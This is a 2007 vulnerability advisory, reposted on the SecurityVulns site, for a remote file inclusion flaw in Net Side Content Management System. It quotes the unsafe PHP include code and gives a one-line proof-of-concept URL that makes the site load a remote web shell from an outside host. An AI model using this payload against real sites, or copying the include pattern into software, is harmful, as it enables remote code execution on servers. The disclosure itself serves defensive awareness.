Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  Image_Upload Script  Remote File Inclusion Exploit Free Image Hosting 2.0

  aspWebCalendar Remote SQL Injection Vulnerability

  LMS <= 1.8.9 Vala Remote File Inclusion Vulnerabilities

  ttCMS <= v4 (ez_sql.php lib_path) Remote File Inclusion Vulnerability

From:Sharingan <magenkyo.sharingan_(at)_yahoo.com>
Date:25 марта 2007 г.
Subject:Net Side Content Management System

I see your future and your future is death. Sharingan !
---------------------------------------------------------------------------------
-----------------------------
Hi I'm sharingan and this is my vuln :
script name :
Net Side Content Management System
(2 versions found both vulnerable | Version names not available since the script isn't downloadable)

vuln file :
index.php |and maybe others ... haven't checked|
vuln code version 1:
[...]
   if ($_GET["cms"] == "" or $_GET["cms"] == "titel")
  {
   include "titel.inc.php";
  }
  else
  {
   include $_GET["cms"].".inc.php";
[...]
vuln code version 2:
[...]
$includepath = "";
[...]
if ($_GET["cms"] == "")
  {
    include $includepath."titel.inc.php";
  }
  else
  {
   include $includepath.$_GET["cms"].".inc.php";
[...]

proof of concept :
http://site.com/index.php?cms=http://whatever.com/textshell.txt?
"powered by Net-Side.net"
---------------------------------------------------------------------------------
-----------------------------
greetz mozi and all php freaks.
oh yeah and a friendly Hi! to RST.

# milw0rm.com [2007-03-24]

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород